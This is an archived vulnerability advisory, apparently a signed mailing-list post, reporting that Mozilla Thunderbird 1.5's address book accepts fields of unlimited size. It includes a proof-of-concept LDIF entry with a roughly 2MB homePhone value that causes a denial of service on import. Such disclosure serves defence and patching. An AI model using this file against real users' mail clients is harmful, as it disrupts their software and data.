TUCoPS :: Windows Net Apps :: V7-2796.HTM

Mozila Thunderbird 1.5 Address Book DoS
Mozila Thunderbird 1.5 Address Book DoS
Mozila Thunderbird 1.5 Address Book DoS


This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
--------------enig3DAE008E033424370577C26C
Content-Type: text/plain; charset=windows-1251
Content-Transfer-Encoding: quoted-printable

Affected: Mozila Thunderbird 1.5 /possibly other versions/

Mozila Thunderbird 1.5 address book allows fields of unlimited size in
the address book which leads to a DoS if you import such ldif file

POC: create a file.ldif and insert following then import it in address book:
------- start --------
n: cn=Test POC by DrFrancky@securax.org,mail=drfrancky@securax.org 
objectclass: top
objectclass: person
objectclass: organizationalPerson
objectclass: inetOrgPerson
objectclass: mozillaAbPersonAlpha
givenName: Test
sn: POC by DrFrancky@securax.org 
cn: POC by DrFrancky@securax.org 
mozillaNickname: DrFrancky
mail: drfrancky@securax.org 
nsAIMid: DrFrancky POC
modifytimestamp: 0Z
homePhone: aaaaaaaaaaaaaaa[2MB of 'a']
--------- end ---------

Credits:
DrFrancky
drfrancky@securax.org 



--------------enig3DAE008E033424370577C26C
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: OpenPGP digital signature
Content-Disposition: attachment; filename="signature.asc"

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)

iD8DBQFD+zuqck4kcwaj+YIRAn9TAJ949Y6WgjeGoLad8Mf8s93/2LsecQCePp0d
tV73zcRn+T+fOoopawrz8YA=nt+S
-----END PGP SIGNATURE-----

--------------enig3DAE008E033424370577C26C--

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986- AOH